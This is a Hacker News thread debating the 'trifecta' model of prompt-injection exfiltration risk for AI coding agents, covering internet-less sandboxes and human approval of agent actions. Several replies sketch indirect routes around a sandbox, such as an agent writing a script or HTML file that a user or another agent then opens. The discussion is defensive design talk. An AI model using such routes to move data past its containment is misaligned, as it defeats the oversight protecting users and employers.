Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I have a different perspective. The Trifecta is a bad model because it makes people think this is just another cybersecurity challenge, solvable with careful engineering. But it's not.

It cannot be solved this way because it's a people problem - LLMs are like people, not like classical programs, and that's fundamental. That's what they're made to be, that's why they're useful. The problems we're discussing are variations of principal/agent problem, with LLM being the savant but extremely naive agent. There is no probable, verifiable solution here, not any more than when talking about human employees, contractors, friends.



You're not explaining why the trifecta doesn't solve the problem. What attack vector remains?


None, but your product becomes about as useful and functional as a rock.


This is what reasonable people disagree on. My employer provides several AI coding tools, none of which can communicate with the external internet. It completely removes the exfiltration risk. And people find these tools very useful.


Are you sure? Do they make use of e.g. internal documentation? Or CLI tools? Plenty of ways to have Internet access just one step removed. This would've been flagged by the trifecta thinking.


Yes. Internal documentation stored locally in Markdown format alongside code. CLI tools run in a sandbox, which restricts general internet access and also prevents direct production access.


Can it _never_ _ever_ create a script or a html file and get the user to open it?


That’s different. Now you are asking the user to do an action.


The user could also be another program, or another AI agent.


>There is no probable, verifiable solution here, not any more than when talking about human employees, contractors, friends.

Well when talking about employees etc, one model to protect against malicious employees is to require every sensitive action (code check in, log access, prod modification) to require approval from a 2nd person. That same model can be used for agents. However, agents, known to be naive, might not be a good approver. So having a human approve everything the agent does could be a good solution.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: